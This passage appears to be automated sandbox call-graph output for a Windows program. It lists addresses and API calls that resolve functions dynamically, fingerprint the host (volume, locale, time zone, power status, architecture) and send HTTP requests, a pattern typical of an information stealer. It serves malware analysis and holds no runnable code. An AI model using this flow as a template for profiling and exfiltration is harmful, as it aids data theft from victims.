ec3bcc 14080->14081 14082 ec45c0 2 API calls 14081->14082 14083 ec3be5 14082->14083 14084 ec45c0 2 API calls 14083->14084 14085 ec3bfe 14084->14085 14086 ec45c0 2 API calls 14085->14086 14087 ec3c17 14086->14087 14088 ec45c0 2 API calls 14087->14088 14089 ec3c30 14088->14089 14090 ec45c0 2 API calls 14089->14090 14091 ec3c49 14090->14091 14092 ec45c0 2 API calls 14091->14092 14093 ec3c62 14092->14093 14094 ec45c0 2 API calls 14093->14094 14095 ec3c7b 14094->14095 14096 ec45c0 2 API calls 14095->14096 14097 ec3c94 14096->14097 14098 ec45c0 2 API calls 14097->14098 14099 ec3cad 14098->14099 14100 ec45c0 2 API calls 14099->14100 14101 ec3cc6 14100->14101 14102 ec45c0 2 API calls 14101->14102 14103 ec3cdf 14102->14103 14104 ec45c0 2 API calls 14103->14104 14105 ec3cf8 14104->14105 14106 ec45c0 2 API calls 14105->14106 14107 ec3d11 14106->14107 14108 ec45c0 2 API calls 14107->14108 14109 ec3d2a 14108->14109 14110 ec45c0 2 API calls 14109->14110 14111 ec3d43 14110->14111 14112 ec45c0 2 API calls 14111->14112 14113 ec3d5c 14112->14113 14114 ec45c0 2 API calls 14113->14114 14115 ec3d75 14114->14115 14116 ec45c0 2 API calls 14115->14116 14117 ec3d8e 14116->14117 14118 ec45c0 2 API calls 14117->14118 14119 ec3da7 14118->14119 14120 ec45c0 2 API calls 14119->14120 14121 ec3dc0 14120->14121 14122 ec45c0 2 API calls 14121->14122 14123 ec3dd9 14122->14123 14124 ec45c0 2 API calls 14123->14124 14125 ec3df2 14124->14125 14126 ec45c0 2 API calls 14125->14126 14127 ec3e0b 14126->14127 14128 ec45c0 2 API calls 14127->14128 14129 ec3e24 14128->14129 14130 ec45c0 2 API calls 14129->14130 14131 ec3e3d 14130->14131 14132 ec45c0 2 API calls 14131->14132 14133 ec3e56 14132->14133 14134 ec45c0 2 API calls 14133->14134 14135 ec3e6f 14134->14135 14136 ec45c0 2 API calls 14135->14136 14137 ec3e88 14136->14137 14138 ec45c0 2 API calls 14137->14138 14139 ec3ea1 14138->14139 14140 ec45c0 2 API calls 14139->14140 14141 ec3eba 14140->14141 14142 ec45c0 2 API calls 14141->14142 14143 ec3ed3 14142->14143 14144 ec45c0 2 API calls 14143->14144 14145 ec3eec 14144->14145 14146 ec45c0 2 API calls 14145->14146 14147 ec3f05 14146->14147 14148 ec45c0 2 API calls 14147->14148 14149 ec3f1e 14148->14149 14150 ec45c0 2 API calls 14149->14150 14151 ec3f37 14150->14151 14152 ec45c0 2 API calls 14151->14152 14153 ec3f50 14152->14153 14154 ec45c0 2 API calls 14153->14154 14155 ec3f69 14154->14155 14156 ec45c0 2 API calls 14155->14156 14157 ec3f82 14156->14157 14158 ec45c0 2 API calls 14157->14158 14159 ec3f9b 14158->14159 14160 ec45c0 2 API calls 14159->14160 14161 ec3fb4 14160->14161 14162 ec45c0 2 API calls 14161->14162 14163 ec3fcd 14162->14163 14164 ec45c0 2 API calls 14163->14164 14165 ec3fe6 14164->14165 14166 ec45c0 2 API calls 14165->14166 14167 ec3fff 14166->14167 14168 ec45c0 2 API calls 14167->14168 14169 ec4018 14168->14169 14170 ec45c0 2 API calls 14169->14170 14171 ec4031 14170->14171 14172 ec45c0 2 API calls 14171->14172 14173 ec404a 14172->14173 14174 ec45c0 2 API calls 14173->14174 14175 ec4063 14174->14175 14176 ec45c0 2 API calls 14175->14176 14177 ec407c 14176->14177 14178 ec45c0 2 API calls 14177->14178 14179 ec4095 14178->14179 14180 ec45c0 2 API calls 14179->14180 14181 ec40ae 14180->14181 14182 ec45c0 2 API calls 14181->14182 14183 ec40c7 14182->14183 14184 ec45c0 2 API calls 14183->14184 14185 ec40e0 14184->14185 14186 ec45c0 2 API calls 14185->14186 14187 ec40f9 14186->14187 14188 ec45c0 2 API calls 14187->14188 14189 ec4112 14188->14189 14190 ec45c0 2 API calls 14189->14190 14191 ec412b 14190->14191 14192 ec45c0 2 API calls 14191->14192 14193 ec4144 14192->14193 14194 ec45c0 2 API calls 14193->14194 14195 ec415d 14194->14195 14196 ec45c0 2 API calls 14195->14196 14197 ec4176 14196->14197 14198 ec45c0 2 API calls 14197->14198 14199 ec418f 14198->14199 14200 ec45c0 2 API calls 14199->14200 14201 ec41a8 14200->14201 14202 ec45c0 2 API calls 14201->14202 14203 ec41c1 14202->14203 14204 ec45c0 2 API calls 14203->14204 14205 ec41da 14204->14205 14206 ec45c0 2 API calls 14205->14206 14207 ec41f3 14206->14207 14208 ec45c0 2 API calls 14207->14208 14209 ec420c 14208->14209 14210 ec45c0 2 API calls 14209->14210 14211 ec4225 14210->14211 14212 ec45c0 2 API calls 14211->14212 14213 ec423e 14212->14213 14214 ec45c0 2 API calls 14213->14214 14215 ec4257 14214->14215 14216 ec45c0 2 API calls 14215->14216 14217 ec4270 14216->14217 14218 ec45c0 2 API calls 14217->14218 14219 ec4289 14218->14219 14220 ec45c0 2 API calls 14219->14220 14221 ec42a2 14220->14221 14222 ec45c0 2 API calls 14221->14222 14223 ec42bb 14222->14223 14224 ec45c0 2 API calls 14223->14224 14225 ec42d4 14224->14225 14226 ec45c0 2 API calls 14225->14226 14227 ec42ed 14226->14227 14228 ec45c0 2 API calls 14227->14228 14229 ec4306 14228->14229 14230 ec45c0 2 API calls 14229->14230 14231 ec431f 14230->14231 14232 ec45c0 2 API calls 14231->14232 14233 ec4338 14232->14233 14234 ec45c0 2 API calls 14233->14234 14235 ec4351 14234->14235 14236 ec45c0 2 API calls 14235->14236 14237 ec436a 14236->14237 14238 ec45c0 2 API calls 14237->14238 14239 ec4383 14238->14239 14240 ec45c0 2 API calls 14239->14240 14241 ec439c 14240->14241 14242 ec45c0 2 API calls 14241->14242 14243 ec43b5 14242->14243 14244 ec45c0 2 API calls 14243->14244 14245 ec43ce 14244->14245 14246 ec45c0 2 API calls 14245->14246 14247 ec43e7 14246->14247 14248 ec45c0 2 API calls 14247->14248 14249 ec4400 14248->14249 14250 ec45c0 2 API calls 14249->14250 14251 ec4419 14250->14251 14252 ec45c0 2 API calls 14251->14252 14253 ec4432 14252->14253 14254 ec45c0 2 API calls 14253->14254 14255 ec444b 14254->14255 14256 ec45c0 2 API calls 14255->14256 14257 ec4464 14256->14257 14258 ec45c0 2 API calls 14257->14258 14259 ec447d 14258->14259 14260 ec45c0 2 API calls 14259->14260 14261 ec4496 14260->14261 14262 ec45c0 2 API calls 14261->14262 14263 ec44af 14262->14263 14264 ec45c0 2 API calls 14263->14264 14265 ec44c8 14264->14265 14266 ec45c0 2 API calls 14265->14266 14267 ec44e1 14266->14267 14268 ec45c0 2 API calls 14267->14268 14269 ec44fa 14268->14269 14270 ec45c0 2 API calls 14269->14270 14271 ec4513 14270->14271 14272 ec45c0 2 API calls 14271->14272 14273 ec452c 14272->14273 14274 ec45c0 2 API calls 14273->14274 14275 ec4545 14274->14275 14276 ec45c0 2 API calls 14275->14276 14277 ec455e 14276->14277 14278 ec45c0 2 API calls 14277->14278 14279 ec4577 14278->14279 14280 ec45c0 2 API calls 14279->14280 14281 ec4590 14280->14281 14282 ec45c0 2 API calls 14281->14282 14283 ec45a9 14282->14283 14284 ed9c10 14283->14284 14285 eda036 8 API calls 14284->14285 14286 ed9c20 43 API calls 14284->14286 14287 eda0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14285->14287 14288 eda146 14285->14288 14286->14285 14287->14288 14289 eda216 14288->14289 14290 eda153 8 API calls 14288->14290 14291 eda21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14289->14291 14292 eda298 14289->14292 14290->14289 14291->14292 14293 eda2a5 6 API calls 14292->14293 14294 eda337 14292->14294 14293->14294 14295 eda41f 14294->14295 14296 eda344 9 API calls 14294->14296 14297 eda428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14295->14297 14298 eda4a2 14295->14298 14296->14295 14297->14298 14299 eda4dc 14298->14299 14300 eda4ab GetProcAddress GetProcAddress 14298->14300 14301 eda515 14299->14301 14302 eda4e5 GetProcAddress GetProcAddress 14299->14302 14300->14299 14303 eda612 14301->14303 14304 eda522 10 API calls 14301->14304 14302->14301 14305 eda67d 14303->14305 14306 eda61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14303->14306 14304->14303 14307 eda69e 14305->14307 14308 eda686 GetProcAddress 14305->14308 14306->14305 14309 ed5ca3 14307->14309 14310 eda6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14307->14310 14308->14307 14311 ec1590 14309->14311 14310->14309 15432 ec1670 14311->15432 14314 eda7a0 lstrcpy 14315 ec15b5 14314->14315 14316 eda7a0 lstrcpy 14315->14316 14317 ec15c7 14316->14317 14318 eda7a0 lstrcpy 14317->14318 14319 ec15d9 14318->14319 14320 eda7a0 lstrcpy 14319->14320 14321 ec1663 14320->14321 14322 ed5510 14321->14322 14323 ed5521 14322->14323 14324 eda820 2 API calls 14323->14324 14325 ed552e 14324->14325 14326 eda820 2 API calls 14325->14326 14327 ed553b 14326->14327 14328 eda820 2 API calls 14327->14328 14329 ed5548 14328->14329 14330 eda740 lstrcpy 14329->14330 14331 ed5555 14330->14331 14332 eda740 lstrcpy 14331->14332 14333 ed5562 14332->14333 14334 eda740 lstrcpy 14333->14334 14335 ed556f 14334->14335 14336 eda740 lstrcpy 14335->14336 14347 ed557c 14336->14347 14337 ec1590 lstrcpy 14337->14347 14338 ed5643 StrCmpCA 14338->14347 14339 ed56a0 StrCmpCA 14340 ed57dc 14339->14340 14339->14347 14341 eda8a0 lstrcpy 14340->14341 14342 ed57e8 14341->14342 14343 eda820 2 API calls 14342->14343 14345 ed57f6 14343->14345 14344 eda820 lstrlen lstrcpy 14344->14347 14348 eda820 2 API calls 14345->14348 14346 ed5856 StrCmpCA 14346->14347 14349 ed5991 14346->14349 14347->14337 14347->14338 14347->14339 14347->14344 14347->14346 14350 eda7a0 lstrcpy 14347->14350 14357 ed5a0b StrCmpCA 14347->14357 14361 eda740 lstrcpy 14347->14361 14368 ed52c0 25 API calls 14347->14368 14370 ed578a StrCmpCA 14347->14370 14374 ed593f StrCmpCA 14347->14374 14375 ed51f0 20 API calls 14347->14375 14376 eda8a0 lstrcpy 14347->14376 14352 ed5805 14348->14352 14351 eda8a0 lstrcpy 14349->14351 14350->14347 14353 ed599d 14351->14353 14354 ec1670 lstrcpy 14352->14354 14355 eda820 2 API calls 14353->14355 14373 ed5811 14354->14373 14356 ed59ab 14355->14356 14358 eda820 2 API calls 14356->14358 14359 ed5a28 14357->14359 14360 ed5a16 Sleep 14357->14360 14362 ed59ba 14358->14362 14363 eda8a0 lstrcpy 14359->14363 14360->14347 14361->14347 14364 ec1670 lstrcpy 14362->14364 14365 ed5a34 14363->14365 14364->14373 14366 eda820 2 API calls 14365->14366 14367 ed5a43 14366->14367 14369 eda820 2 API calls 14367->14369 14368->14347 14371 ed5a52 14369->14371 14370->14347 14372 ec1670 lstrcpy 14371->14372 14372->14373 14373->13429 14374->14347 14375->14347 14376->14347 14378 ed754c 14377->14378 14379 ed7553 GetVolumeInformationA 14377->14379 14378->14379 14383 ed7591 14379->14383 14380 ed75fc GetProcessHeap RtlAllocateHeap 14381 ed7619 14380->14381 14382 ed7628 wsprintfA 14380->14382 14384 eda740 lstrcpy 14381->14384 14385 eda740 lstrcpy 14382->14385 14383->14380 14386 ed5da7 14384->14386 14385->14386 14386->13450 14388 eda7a0 lstrcpy 14387->14388 14389 ec4899 14388->14389 15441 ec47b0 14389->15441 14391 ec48a5 14392 eda740 lstrcpy 14391->14392 14393 ec48d7 14392->14393 14394 eda740 lstrcpy 14393->14394 14395 ec48e4 14394->14395 14396 eda740 lstrcpy 14395->14396 14397 ec48f1 14396->14397 14398 eda740 lstrcpy 14397->14398 14399 ec48fe 14398->14399 14400 eda740 lstrcpy 14399->14400 14401 ec490b InternetOpenA StrCmpCA 14400->14401 14402 ec4944 14401->14402 14403 ec4ecb InternetCloseHandle 14402->14403 15447 ed8b60 14402->15447 14404 ec4ee8 14403->14404 15462 ec9ac0 CryptStringToBinaryA 14404->15462 14406 ec4963 15455 eda920 14406->15455 14409 ec4976 14411 eda8a0 lstrcpy 14409->14411 14416 ec497f 14411->14416 14412 eda820 2 API calls 14413 ec4f05 14412->14413 14414 eda9b0 4 API calls 14413->14414 14417 ec4f1b 14414->14417 14415 ec4f27 codecvt 14418 eda7a0 lstrcpy 14415->14418 14420 eda9b0 4 API calls 14416->14420 14419 eda8a0 lstrcpy 14417->14419 14431 ec4f57 14418->14431 14419->14415 14421 ec49a9 14420->14421 14422 eda8a0 lstrcpy 14421->14422 14423 ec49b2 14422->14423 14424 eda9b0 4 API calls 14423->14424 14425 ec49d1 14424->14425 14426 eda8a0 lstrcpy 14425->14426 14427 ec49da 14426->14427 14428 eda920 3 API calls 14427->14428 14429 ec49f8 14428->14429 14430 eda8a0 lstrcpy 14429->14430 14432 ec4a01 14430->14432 14431->13453 14433 eda9b0 4 API calls 14432->14433 14434 ec4a20 14433->14434 14435 eda8a0 lstrcpy 14434->14435 14436 ec4a29 14435->14436 14437 eda9b0 4 API calls 14436->14437 14438 ec4a48 14437->14438 14439 eda8a0 lstrcpy 14438->14439 14440 ec4a51 14439->14440 14441 eda9b0 4 API calls 14440->14441 14442 ec4a7d 14441->14442 14443 eda920 3 API calls 14442->14443 14444 ec4a84 14443->14444 14445 eda8a0 lstrcpy 14444->14445 14446 ec4a8d 14445->14446 14447 ec4aa3 InternetConnectA 14446->14447 14447->14403 14448 ec4ad3 HttpOpenRequestA 14447->14448 14450 ec4ebe InternetCloseHandle 14448->14450 14451 ec4b28 14448->14451 14450->14403 14452 eda9b0 4 API calls 14451->14452 14453 ec4b3c 14452->14453 14454 eda8a0 lstrcpy 14453->14454 14455 ec4b45 14454->14455 14456 eda920 3 API calls 14455->14456 14457 ec4b63 14456->14457 14458 eda8a0 lstrcpy 14457->14458 14459 ec4b6c 14458->14459 14460 eda9b0 4 API calls 14459->14460 14461 ec4b8b 14460->14461 14462 eda8a0 lstrcpy 14461->14462 14463 ec4b94 14462->14463 14464 eda9b0 4 API calls 14463->14464 14465 ec4bb5 14464->14465 14466 eda8a0 lstrcpy 14465->14466 14467 ec4bbe 14466->14467 14468 eda9b0 4 API calls 14467->14468 14469 ec4bde 14468->14469 14470 eda8a0 lstrcpy 14469->14470 14471 ec4be7 14470->14471 14472 eda9b0 4 API calls 14471->14472 14473 ec4c06 14472->14473 14474 eda8a0 lstrcpy 14473->14474 14475 ec4c0f 14474->14475 14476 eda920 3 API calls 14475->14476 14477 ec4c2d 14476->14477 14478 eda8a0 lstrcpy 14477->14478 14479 ec4c36 14478->14479 14480 eda9b0 4 API calls 14479->14480 14481 ec4c55 14480->14481 14482 eda8a0 lstrcpy 14481->14482 14483 ec4c5e 14482->14483 14484 eda9b0 4 API calls 14483->14484 14485 ec4c7d 14484->14485 14486 eda8a0 lstrcpy 14485->14486 14487 ec4c86 14486->14487 14488 eda920 3 API calls 14487->14488 14489 ec4ca4 14488->14489 14490 eda8a0 lstrcpy 14489->14490 14491 ec4cad 14490->14491 14492 eda9b0 4 API calls 14491->14492 14493 ec4ccc 14492->14493 14494 eda8a0 lstrcpy 14493->14494 14495 ec4cd5 14494->14495 14496 eda9b0 4 API calls 14495->14496 14497 ec4cf6 14496->14497 14498 eda8a0 lstrcpy 14497->14498 14499 ec4cff 14498->14499 14500 eda9b0 4 API calls 14499->14500 14501 ec4d1f 14500->14501 14502 eda8a0 lstrcpy 14501->14502 14503 ec4d28 14502->14503 14504 eda9b0 4 API calls 14503->14504 14505 ec4d47 14504->14505 14506 eda8a0 lstrcpy 14505->14506 14507 ec4d50 14506->14507 14508 eda920 3 API calls 14507->14508 14509 ec4d6e 14508->14509 14510 eda8a0 lstrcpy 14509->14510 14511 ec4d77 14510->14511 14512 eda740 lstrcpy 14511->14512 14513 ec4d92 14512->14513 14514 eda920 3 API calls 14513->14514 14515 ec4db3 14514->14515 14516 eda920 3 API calls 14515->14516 14517 ec4dba 14516->14517 14518 eda8a0 lstrcpy 14517->14518 14519 ec4dc6 14518->14519 14520 ec4de7 lstrlen 14519->14520 14521 ec4dfa 14520->14521 14522 ec4e03 lstrlen 14521->14522 15461 edaad0 14522->15461 14524 ec4e13 HttpSendRequestA 14525 ec4e32 InternetReadFile 14524->14525 14526 ec4e67 InternetCloseHandle 14525->14526 14531 ec4e5e 14525->14531 14529 eda800 14526->14529 14528 eda9b0 4 API calls 14528->14531 14529->14450 14530 eda8a0 lstrcpy 14530->14531 14531->14525 14531->14526 14531->14528 14531->14530 15468 edaad0 14532->15468 14534 ed17c4 StrCmpCA 14535 ed17cf ExitProcess 14534->14535 14539 ed17d7 14534->14539 14536 ed19c2 14536->13455 14537 ed18ad StrCmpCA 14537->14539 14538 ed18cf StrCmpCA 14538->14539 14539->14536 14539->14537 14539->14538 14540 ed185d StrCmpCA 14539->14540 14541 ed187f StrCmpCA 14539->14541 14542 ed18f1 StrCmpCA 14539->14542 14543 ed1951 StrCmpCA 14539->14543 14544 ed1970 StrCmpCA 14539->14544 14545 ed1913 StrCmpCA 14539->14545 14546 ed1932 StrCmpCA 14539->14546 14547 eda820 lstrlen lstrcpy 14539->14547 14540->14539 14541->14539 14542->14539 14543->14539 14544->14539 14545->14539 14546->14539 14547->14539 14549 eda7a0 lstrcpy 14548->14549 14550 ec5979 14549->14550 14551 ec47b0 2 API calls 14550->14551 14552 ec5985 14551->14552 14553 eda740 lstrcpy 14552->14553 14554 ec59ba 14553->14554 14555 eda740 lstrcpy 14554->14555 14556 ec59c7 14555->14556 14557 eda740 lstrcpy 14556->14557 14558 ec59d4 14557->14558 14559 eda740 lstrcpy 14558->14559 14560 ec59e1 14559->14560 14561 eda740 lstrcpy 14560->14561 14562 ec59ee InternetOpenA StrCmpCA 14561->14562 14563 ec5a1d 14562->14563 14564 ec5fc3 InternetCloseHandle 14563->14564 14565 ed8b60 3 API calls 14563->14565 14566 ec5fe0 14564->14566 14567 ec5a3c 14565->14567 14569 ec9ac0 4 API calls 14566->14569 14568 eda920 3 API calls 14567->14568 14570 ec5a4f 14568->14570 14571 ec5fe6 14569->14571 14572 eda8a0 lstrcpy 14570->14572 14573 eda820 2 API calls 14571->14573 14575 ec601f codecvt 14571->14575 14577 ec5a58 14572->14577 14574 ec5ffd 14573->14574 14576 eda9b0 4 API calls 14574->14576 14579 eda7a0 lstrcpy 14575->14579 14578 ec6013 14576->14578 14581 eda9b0 4 API calls 14577->14581 14580 eda8a0 lstrcpy 14578->14580 14588 ec604f 14579->14588 14580->14575 14582 ec5a82 14581->14582 14583 eda8a0 lstrcpy 14582->14583 14584 ec5a8b 14583->14584 14585 eda9b0 4 API calls 14584->14585 14586 ec5aaa 14585->14586 14587 eda8a0 lstrcpy 14586->14587 14589 ec5ab3 14587->14589 14588->13461 14590 eda920 3 API calls 14589->14590 14591 ec5ad1 14590->14591 14592 eda8a0 lstrcpy 14591->14592 14593 ec5ada 14592->14593 14594 eda9b0 4 API calls 14593->14594 14595 ec5af9 14594->14595 14596 eda8a0 lstrcpy 14595->14596 14597 ec5b02 14596->14597 14598 eda9b0 4 API calls 14597->14598 14599 ec5b21 14598->14599 14600 eda8a0 lstrcpy 14599->14600 14601 ec5b2a 14600->14601 14602 eda9b0 4 API calls 14601->14602 14603 ec5b56 14602->14603 14604 eda920 3 API calls 14603->14604 14605 ec5b5d 14604->14605 14606 eda8a0 lstrcpy 14605->14606 14607 ec5b66 14606->14607 14608 ec5b7c InternetConnectA 14607->14608 14608->14564 14609 ec5bac HttpOpenRequestA 14608->14609 14611 ec5c0b 14609->14611 14612 ec5fb6 InternetCloseHandle 14609->14612 14613 eda9b0 4 API calls 14611->14613 14612->14564 14614 ec5c1f 14613->14614 14615 eda8a0 lstrcpy 14614->14615 14616 ec5c28 14615->14616 14617 eda920 3 API calls 14616->14617 14618 ec5c46 14617->14618 14619 eda8a0 lstrcpy 14618->14619 14620 ec5c4f 14619->14620 14621 eda9b0 4 API calls 14620->14621 14622 ec5c6e 14621->14622 14623 eda8a0 lstrcpy 14622->14623 14624 ec5c77 14623->14624 14625 eda9b0 4 API calls 14624->14625 14626 ec5c98 14625->14626 14627 eda8a0 lstrcpy 14626->14627 14628 ec5ca1 14627->14628 14629 eda9b0 4 API calls 14628->14629 14630 ec5cc1 14629->14630 14631 eda8a0 lstrcpy 14630->14631 14632 ec5cca 14631->14632 14633 eda9b0 4 API calls 14632->14633 14634 ec5ce9 14633->14634 14635 eda8a0 lstrcpy 14634->14635 14636 ec5cf2 14635->14636 14637 eda920 3 API calls 14636->14637 14638 ec5d10 14637->14638 14639 eda8a0 lstrcpy 14638->14639 14640 ec5d19 14639->14640 14641 eda9b0 4 API calls 14640->14641 14642 ec5d38 14641->14642 14643 eda8a0 lstrcpy 14642->14643 14644 ec5d41 14643->14644 14645 eda9b0 4 API calls 14644->14645 14646 ec5d60 14645->14646 14647 eda8a0 lstrcpy 14646->14647 14648 ec5d69 14647->14648 14649 eda920 3 API calls 14648->14649 14650 ec5d87 14649->14650 14651 eda8a0 lstrcpy 14650->14651 14652 ec5d90 14651->14652 14653 eda9b0 4 API calls 14652->14653 14654 ec5daf 14653->14654 14655 eda8a0 lstrcpy 14654->14655 14656 ec5db8 14655->14656 14657 eda9b0 4 API calls 14656->14657 14658 ec5dd9 14657->14658 14659 eda8a0 lstrcpy 14658->14659 14660 ec5de2 14659->14660 14661 eda9b0 4 API calls 14660->14661 14662 ec5e02 14661->14662 14663 eda8a0 lstrcpy 14662->14663 14664 ec5e0b 14663->14664 14665 eda9b0 4 API calls 14664->14665 14666 ec5e2a 14665->14666 14667 eda8a0 lstrcpy 14666->14667 14668 ec5e33 14667->14668 14669 eda920 3 API calls 14668->14669 14670 ec5e54 14669->14670 14671 eda8a0 lstrcpy 14670->14671 14672 ec5e5d 14671->14672 14673 ec5e70 lstrlen 14672->14673 15469 edaad0 14673->15469 14675 ec5e81 lstrlen GetProcessHeap RtlAllocateHeap 15470 edaad0 14675->15470 14677 ec5eae lstrlen 14678 ec5ebe 14677->14678 14679 ec5ed7 lstrlen 14678->14679 14680 ec5ee7 14679->14680 14681 ec5ef0 lstrlen 14680->14681 14682 ec5f04 14681->14682 14683 ec5f1a lstrlen 14682->14683 15471 edaad0 14683->15471 14685 ec5f2a HttpSendRequestA 14686 ec5f35 InternetReadFile 14685->14686 14687 ec5f6a InternetCloseHandle 14686->14687 14691 ec5f61 14686->14691 14687->14612 14689 eda9b0 4 API calls 14689->14691 14690 eda8a0 lstrcpy 14690->14691 14691->14686 14691->14687 14691->14689 14691->14690 14693 ed1077 14692->14693 14694 ed1151 14693->14694 14695 eda820 lstrlen lstrcpy 14693->14695 14694->13463 14695->14693 14702 ed0db7 14696->14702 14697 ed0f17 14697->13471 14698 ed0ea4 StrCmpCA 14698->14702 14699 ed0e27 StrCmpCA 14699->14702 14700 ed0e67 StrCmpCA 14700->14702 14701 eda820 lstrlen lstrcpy 14701->14702 14702->14697 14702->14698 14702->14699 14702->14700 14702->14701 14704 ed0f67 14703->14704 14705 ed1044 14704->14705 14706 ed0fb2 StrCmpCA 14704->14706 14707 eda820 lstrlen lstrcpy 14704->14707 14705->13479 14706->14704 14707->14704 14709 eda740 lstrcpy 14708->14709 14710 ed1a26 14709->14710 14711 eda9b0 4 API calls 14710->14711 14712 ed1a37 14711->14712 14713 eda8a0 lstrcpy 14712->14713 14714 ed1a40 14713->14714 14715 eda9b0 4 API calls 14714->14715 14716 ed1a5b 14715->14716 14717 eda8a0 lstrcpy 14716->14717 14718 ed1a64 14717->14718 14719 eda9b0 4 API calls 14718->14719 14720 ed1a7d 14719->14720 14721 eda8a0 lstrcpy 14720->14721 14722 ed1a86 14721->14722 14723 eda9b0 4 API calls 14722->14723 14724 ed1aa1 14723->14724 14725 eda8a0 lstrcpy 14724->14725 14726 ed1aaa 14725->14726 14727 eda9b0 4 API calls 14726->14727 14728 ed1ac3 14727->14728 14729 eda8a0 lstrcpy 14728->14729 14730 ed1acc 14729->14730 14731 eda9b0 4 API calls 14730->14731 14732 ed1ae7 14731->14732 14733 eda8a0 lstrcpy 14732->14733 14734 ed1af0 14733->14734 14735 eda9b0 4 API calls 14734->14735 14736 ed1b09 14735->14736 14737 eda8a0 lstrcpy 14736->14737 14738 ed1b12 14737->14738 14739 eda9b0 4 API calls 14738->14739 14740 ed1b2d 14739->14740 14741 eda8a0 lstrcpy 14740->14741 14742 ed1b36 14741->14742 14743 eda9b0 4 API calls 14742->14743 14744 ed1b4f 14743->14744 14745 eda8a0 lstrcpy 14744->14745 14746 ed1b58 14745->14746 14747 eda9b0 4 API calls 14746->14747 14748 ed1b76 14747->14748 14749 eda8a0 lstrcpy 14748->14749 14750 ed1b7f 14749->14750 14751 ed7500 6 API calls 14750->14751 14752 ed1b96 14751->14752 14753 eda920 3 API calls 14752->14753 14754 ed1ba9 14753->14754 14755 eda8a0 lstrcpy 14754->14755 14756 ed1bb2 14755->14756 14757 eda9b0 4 API calls 14756->14757 14758 ed1bdc 14757->14758 14759 eda8a0 lstrcpy 14758->14759 14760 ed1be5 14759->14760 14761 eda9b0 4 API calls 14760->14761 14762 ed1c05 14761->14762 14763 eda8a0 lstrcpy 14762->14763 14764 ed1c0e 14763->14764 15472 ed7690 GetProcessHeap RtlAllocateHeap 14764->15472 14767 eda9b0 4 API calls 14768 ed1c2e 14767->14768 14769 eda8a0 lstrcpy 14768->14769 14770 ed1c37 14769->14770 14771 eda9b0 4 API calls 14770->14771 14772 ed1c56 14771->14772 14773 eda8a0 lstrcpy 14772->14773 14774 ed1c5f 14773->14774 14775 eda9b0 4 API calls 14774->14775 14776 ed1c80 14775->14776 14777 eda8a0 lstrcpy 14776->14777 14778 ed1c89 14777->14778 15479 ed77c0 GetCurrentProcess IsWow64Process 14778->15479 14781 eda9b0 4 API calls 14782 ed1ca9 14781->14782 14783 eda8a0 lstrcpy 14782->14783 14784 ed1cb2 14783->14784 14785 eda9b0 4 API calls 14784->14785 14786 ed1cd1 14785->14786 14787 eda8a0 lstrcpy 14786->14787 14788 ed1cda 14787->14788 14789 eda9b0 4 API calls 14788->14789 14790 ed1cfb 14789->14790 14791 eda8a0 lstrcpy 14790->14791 14792 ed1d04 14791->14792 14793 ed7850 3 API calls 14792->14793 14794 ed1d14 14793->14794 14795 eda9b0 4 API calls 14794->14795 14796 ed1d24 14795->14796 14797 eda8a0 lstrcpy 14796->14797 14798 ed1d2d 14797->14798 14799 eda9b0 4 API calls 14798->14799 14800 ed1d4c 14799->14800 14801 eda8a0 lstrcpy 14800->14801 14802 ed1d55 14801->14802 14803 eda9b0 4 API calls 14802->14803 14804 ed1d75 14803->14804 14805 eda8a0 lstrcpy 14804->14805 14806 ed1d7e 14805->14806 14807 ed78e0 3 API calls 14806->14807 14808 ed1d8e 14807->14808 14809 eda9b0 4 API calls 14808->14809 14810 ed1d9e 14809->14810 14811 eda8a0 lstrcpy 14810->14811 14812 ed1da7 14811->14812 14813 eda9b0 4 API calls 14812->14813 14814 ed1dc6 14813->14814 14815 eda8a0 lstrcpy 14814->14815 14816 ed1dcf 14815->14816 14817 eda9b0 4 API calls 14816->14817 14818 ed1df0 14817->14818 14819 eda8a0 lstrcpy 14818->14819 14820 ed1df9 14819->14820 15481 ed7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14820->15481 14823 eda9b0 4 API calls 14824 ed1e19 14823->14824 14825 eda8a0 lstrcpy 14824->14825 14826 ed1e22 14825->14826 14827 eda9b0 4 API calls 14826->14827 14828 ed1e41 14827->14828 14829 eda8a0 lstrcpy 14828->14829 14830 ed1e4a 14829->14830 14831 eda9b0 4 API calls 14830->14831 14832 ed1e6b 14831->14832 14833 eda8a0 lstrcpy 14832->14833 14834 ed1e74 14833->14834 15483 ed7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14834->15483 14837 eda9b0 4 API calls 14838 ed1e94 14837->14838 14839 eda8a0 lstrcpy 14838->14839 14840 ed1e9d 14839->14840 14841 eda9b0 4 API calls 14840->14841 14842 ed1ebc 14841->14842 14843 eda8a0 lstrcpy 14842->14843 14844 ed1ec5 14843->14844 14845 eda9b0 4 API calls 14844->14845 14846 ed1ee5 14845->14846 14847 eda8a0 lstrcpy 14846->14847 14848 ed1eee 14847->14848 15486 ed7b00 GetUserDefaultLocaleName 14848->15486 14851 eda9b0 4 API calls 14852 ed1f0e 14851->14852 14853 eda8a0 lstrcpy 14852->14853 14854 ed1f17 14853->14854 14855 eda9b0 4 API calls 14854->14855 14856 ed1f36 14855->14856 14857 eda8a0 lstrcpy 14856->14857 14858 ed1f3f 14857->14858 14859 eda9b0 4 API calls 14858->14859 14860 ed1f60 14859->14860 14861 eda8a0 lstrcpy 14860->14861 14862 ed1f69 14861->14862 15490 ed7b90 14862->15490 14864 ed1f80 14865 eda920 3 API calls 14864->14865 14866 ed1f93 14865->14866 14867 eda8a0 lstrcpy 14866->14867 14868 ed1f9c 14867->14868 14869 eda9b0 4 API calls 14868->14869 14870 ed1fc6 14869->14870 14871 eda8a0 lstrcpy 14870->14871 14872 ed1fcf 14871->14872 14873 eda9b0 4 API calls 14872->14873 14874 ed1fef 14873->14874 14875 eda8a0 lstrcpy 14874->14875 14876 ed1ff8 14875->14876 15502 ed7d80 GetSystemPowerStatus 14876->15502 14879 eda9b0 4 API calls 14880 ed2018 14879->14880 14881 eda8a0 lstrcpy 14880->14881 14882 ed2021 14881->14882 14883 eda9b0 4 API calls 14882->14883 14884 ed2040 14883->14884 14885 eda8a0 lstrcpy 14884->14885 14886 ed2049 14885->14886 14887 eda9b0 4 API calls 14886->14887 